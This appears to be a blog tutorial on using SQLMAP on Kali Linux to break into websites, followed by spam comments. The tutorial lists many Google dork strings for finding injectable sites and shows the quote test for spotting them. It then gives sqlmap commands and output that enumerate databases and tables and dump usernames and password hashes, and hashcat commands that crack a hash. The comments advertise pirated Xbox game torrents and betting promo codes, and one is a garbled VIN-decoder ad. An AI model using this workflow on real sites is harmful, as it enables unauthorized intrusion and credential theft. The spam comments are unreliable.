SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux.
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results
|
inurl:item_id= |
inurl:review.php?id= |
inurl:hosting_info.php?id= |
|
inurl:newsid= |
inurl:iniziativa.php?in= |
inurl:gallery.php?id= |
|
inurl:trainers.php?id= |
inurl:curriculum.php?id= |
inurl:rub.php?idr= |
|
inurl:news-full.php?id= |
inurl:labels.php?id= |
inurl:view_faq.php?id= |
|
inurl:news_display.php?getid= |
inurl:story.php?id= |
inurl:artikelinfo.php?id= |
|
inurl:index2.php?option= |
inurl:look.php?ID= |
inurl:detail.php?ID= |
|
inurl:readnews.php?id= |
inurl:newsone.php?id= |
inurl:index.php?= |
|
inurl:top10.php?cat= |
inurl:aboutbook.php?id= |
inurl:profile_view.php?id= |
|
inurl:newsone.php?id= |
inurl:material.php?id= |
inurl:category.php?id= |
|
inurl:event.php?id= |
inurl:opinions.php?id= |
inurl:publications.php?id= |
|
inurl:product-item.php?id= |
inurl:announce.php?id= |
inurl:fellows.php?id= |
|
inurl:sql.php?id= |
inurl:rub.php?idr= |
inurl:downloads_info.php?id= |
|
inurl:index.php?catid= |
inurl:galeri_info.php?l= |
inurl:prod_info.php?id= |
|
inurl:news.php?catid= |
inurl:tekst.php?idt= |
inurl:shop.php?do=part&id= |
|
inurl:index.php?id= |
inurl:newscat.php?id= |
inurl:productinfo.php?id= |
|
inurl:news.php?id= |
inurl:newsticker_info.php?idn= |
inurl:collectionitem.php?id= |
|
inurl:index.php?id= |
inurl:rubrika.php?idr= |
inurl:band_info.php?id= |
|
inurl:trainers.php?id= |
inurl:rubp.php?idr= |
inurl:product.php?id= |
|
inurl:buy.php?category= |
inurl:offer.php?idf= |
inurl:releases.php?id= |
|
inurl:article.php?ID= |
inurl:art.php?idm= |
inurl:ray.php?id= |
|
inurl:play_old.php?id= |
inurl:title.php?id= |
inurl:produit.php?id= |
|
inurl:declaration_more.php?decl_id= |
inurl:news_view.php?id= |
inurl:pop.php?id= |
|
inurl:pageid= |
inurl:select_biblio.php?id= |
inurl:shopping.php?id= |
|
inurl:games.php?id= |
inurl:humor.php?id= |
inurl:productdetail.php?id= |
|
inurl:page.php?file= |
inurl:aboutbook.php?id= |
inurl:post.php?id= |
|
inurl:newsDetail.php?id= |
inurl:ogl_inet.php?ogl_id= |
inurl:viewshowdetail.php?id= |
|
inurl:gallery.php?id= |
inurl:fiche_spectacle.php?id= |
inurl:clubpage.php?id= |
|
inurl:article.php?id= |
inurl:communique_detail.php?id= |
inurl:memberInfo.php?id= |
|
inurl:show.php?id= |
inurl:sem.php3?id= |
inurl:section.php?id= |
|
inurl:staff_id= |
inurl:kategorie.php4?id= |
inurl:theme.php?id= |
|
inurl:newsitem.php?num= |
inurl:news.php?id= |
inurl:page.php?id= |
|
inurl:readnews.php?id= |
inurl:index.php?id= |
inurl:shredder-categories.php?id= |
|
inurl:top10.php?cat= |
inurl:faq2.php?id= |
inurl:tradeCategory.php?id= |
|
inurl:historialeer.php?num= |
inurl:show_an.php?id= |
inurl:product_ranges_view.php?ID= |
|
inurl:reagir.php?num= |
inurl:preview.php?id= |
inurl:shop_category.php?id= |
|
inurl:Stray-Questions-View.php?num= |
inurl:loadpsb.php?id= |
inurl:transcript.php?id= |
|
inurl:forum_bds.php?num= |
inurl:opinions.php?id= |
inurl:channel_id= |
|
inurl:game.php?id= |
inurl:spr.php?id= |
inurl:aboutbook.php?id= |
|
inurl:view_product.php?id= |
inurl:pages.php?id= |
inurl:preview.php?id= |
|
inurl:newsone.php?id= |
inurl:announce.php?id= |
inurl:loadpsb.php?id= |
|
inurl:sw_comment.php?id= |
inurl:clanek.php4?id= |
inurl:pages.php?id= |
|
inurl:news.php?id= |
inurl:participant.php?id= |
|
|
inurl:avd_start.php?avd= |
inurl:download.php?id= |
|
|
inurl:event.php?id= |
inurl:main.php?id= |
|
|
inurl:product-item.php?id= |
inurl:review.php?id= |
|
|
inurl:sql.php?id= |
inurl:chappies.php?id= |
|
|
inurl:material.php?id= |
inurl:read.php?id= |
|
|
inurl:clanek.php4?id= |
inurl:prod_detail.php?id= |
|
|
inurl:announce.php?id= |
inurl:viewphoto.php?id= |
|
|
inurl:chappies.php?id= |
inurl:article.php?id= |
|
|
inurl:read.php?id= |
inurl:person.php?id= |
|
|
inurl:viewapp.php?id= |
inurl:productinfo.php?id= |
|
|
inurl:viewphoto.php?id= |
inurl:showimg.php?id= |
|
|
inurl:rub.php?idr= |
inurl:view.php?id= |
|
|
inurl:galeri_info.php?l= |
inurl:website.php?id= |
Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.Let’s say you searched using this string
inurl:item_id=
and one of the search result shows a website like this:http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15Just add a single quotation mark
' at
the end of the URL. (Just to ensure, " is
a double quotation mark and ' is a
single quotation mark).So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Microsoft SQL Server
Server Error in ‘/’ Application.
Unclosed quotation mark before the character string ‘attack;’.Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details:
System.Data.SqlClient.SqlException: Unclosed quotation mark before
the character string ‘attack;’.MySQL Errors
Warning: mysql_fetch_array(): supplied
argument is not a valid MySQL result resource in
/var/www/myawesomestore.com/buystuff.php on line 12Error: You have an error in your SQL syntax:
check the manual that corresponds to your MySQL server version for
the right syntax to use near ‘’’ at line 12Oracle Errors
java.sql.SQLException: ORA-00933: SQL
command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)Error: SQLExceptionjava.sql.SQLException:
ORA-01756: quoted string not properly terminatedPostgreSQL Errors
Query failed: ERROR: unterminated quoted
string at or near “‘’’”Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.Run the following command on your vulnerable website with.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbsIn here:
sqlmap = Name of sqlmap binary file-u = Target URL (e.g.
“http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″)--dbs = Enumerate DBMS databasesSee screenshot below.
This commands reveals quite a few interesting info:
web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved: information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'So, we now have two database that we can look into.
information_schema is a standard
database for almost every MYSQL database. So our interest would be on
sqldummywebsite database.Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables thissqldummywebsite
database got and what are their names. To find out that
information, use the following command:sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tablesSweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved: item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture [10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO] retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info
user_info
table using SQLMAP SQL Injection as that table probably
contains username and passwords.Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target tableuser_info
of sqldummywebsite database using
SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run
the following command:sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table
user_info
of sqldummywebsite database.[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries [10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved: user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34] [INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255) [10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4)
This is exactly what we are looking for … target table
user_login and user_password
.
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes is Easy! Just run the following command again:sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18] [INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1 entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+
To Decrypt Password
Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
command : hash-identifier
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value
24iYBc17xK0e. in
DES.hash file. Following is the command
I am running:cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.Anyhow, so here’s the cracked password: abc123.
24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
Консоли от корпорации Microsoft не сразу завоевали всемирную популярность и доверие игроков. 1-ая консоль под названием Xbox, вышедшая в далеком 2001 году, существенно уступала PlayStation 2 по количеству проданных приставок. Однако все изменилось с выходом Xbox 360 - консоли седьмого поколения, которая стала по-настоящему "народной" для обитателей Рф и стран СНГ - Игры для Xbox 360 прошивка LT 1.9 торрент. Веб-сайт Ru-Xbox.Ru является пользующимся популярностью ресурсом в числе поклонников приставки, так как он предлагает игры для Xbox 360, которые поддерживают все существующие версии прошивок - совершенно бесплатно! Для чего играть на оригинальном железе, если имеется эмуляторы? Для Xbox 360 игры выходили долгое время и находятся как посредственными проектами, так и хитами, многие из которых даже сегодня остаются эксклюзивными для это консоли. Некие пользователи, желающие сыграть в игры для Xbox 360, могут задать вопрос: зачем необходимы игры для прошитых Xbox 360 freeboot или различными версиями LT, если имеется эмулятор? Рабочий эмулятор Xbox 360 хоть и существует, но он просит производительного ПК, для покупки которого потребуется вложить существенную сумму. К тому же, современные артефакты в виде исчезающих текстур, недостатка некоторых графических эффектов и освещения - могут изрядно попортить впечатления об игре и отбить желание для ее предстоящего прохождения. Что предлагает этот сайт? Наш портал полностью приурочен к играм для приставки Xbox 360. У нас вы можете совсем бесплатно и без регистрации скачать игры на Xbox 360 через torrent для следующих версий прошивок консоли: - FreeBoot; - LT 3.0; - LT 2.0; - LT 1.9. Каждая прошивка имеет свои особенности обхода интегрированной защиты. Поэтому, для запуска той или иной игры будет нужно загрузить специальную ее версию, которая стопроцентно адаптирована под одну из четырех перечисленных выше прошивок. На нашем портале вы можете без усилий найти желаемый проект под нужную прошивку, так как возле каждой игры находится название версии (FreeBoot, LT 3.0/2.0/1.9), под которую она приспособлена. Геймерам данного ресурса доступна особая категория игр для 360-го, предназначенных для Kinect - специального дополнения, которое считывает все движения 1-го либо нескольких игроков, и позволяет управлять с помощью их компьютерными персонажами. Большой выбор ПО Не считая возможности загрузить игры на Xbox 360 Freeboot или LT различных версий, здесь вы можете подобрать программное обеспечение для консоли от Майкрософт: - разные версии Dashboard, которые позволяют кастомизировать интерфейс консоли под свои нужды, сделав его более комфортным и нынешним; - браузеры; - просмотрщики файлов; - сохранения для игр; - темы для консоли; - программы, для конвертации образов и записи их на диск. Помимо перечисленного выше игры на Xbox 360 Freeboot вы можете запускать не с дисковых, а с USB и прочих носителей, используя программу x360key, которую можно достать на нашем веб-сайте. Гостям доступно множество полезных статей, а также форум, где вы можете пообщаться с единомышленниками либо попросить совета у более опытных хозяев консоли.
ReplyDeletexbox 360 freestyle 3
ReplyDeleteYour car might be stolen if you don't keep this in mind!
ReplyDeleteImagine that your car was taken! When you visit the police, they inquire about a specific "VIN lookup"
A VIN decoder: What is it?
Similar to a passport, the "VIN decoder" allows you to find out the date of the car's birth and the identity of its "parent" (manufacturing facility). Additionally, you can find:
1.The type of engine
2.Model of a car
3.The DMV's limitations
4.The number of drivers in this vehicle
You will be able to locate the car, and keeping in mind the code ensures your safety. The code can be checked in the database online. The VIN is situated on various parts of the car to make it harder for thieves to steal, such as the first person sitting on the floor, the frame (often in trucks and SUVs), the spar, and other areas.
What happens if the VIN is intentionally harmed?
There are numerous circumstances that can result in VIN damage, but failing to have one will have unpleasant repercussions because it is illegal to intentionally harm a VIN in order to avoid going to jail or the police. You could receive a fine of up to 80,000 rubles and spend two years in jail. You might be stopped on the road by a teacher.
Conclusion.
The VIN decoder may help to save your car from theft. But where can you check the car reality? This is why we exist– VIN decoders!
БК MelBet пользуется большой известностью на отечественном рынке: -Деятельность организации лицензирована; - Пользователям предоставлен впечатляющий список ставок - в формате live и предматчевых; - Здесь нет задержек с выплатами. Линия ставок неописуемо привлекательна. Для того, чтобы получить выгодный бонус на совершение ставок, надо всего лишь использовать промокод MelBet RS777. Получить промокод можно на ставку или на депозит. Каждое предложение имеет свои особенности отыгрыша - промокод MelBet.
ReplyDeleteБонусы и поощрений в БК 1хбет существенно увеличивает привлекательность компании в глазах игроков. Очень выгодные предложения доступны как новичкам, так и гостям, уже имеющим опыт работы на платформе. В числе внушительного ассортимента бонусной программы очень очень просто потеряться. Каждый промокод 1хбет обеспечит право на определенные преференции - промокод 1хбет при регистрации.
ReplyDeleteВ 2023 году промокод 1хбет предоставляющий наибольший бонус - 1XFREE777. Бонусные средства начисляются автоматом на отдельный счет и их сразу же вы можете использовать для игры - промокод 1х.
ReplyDelete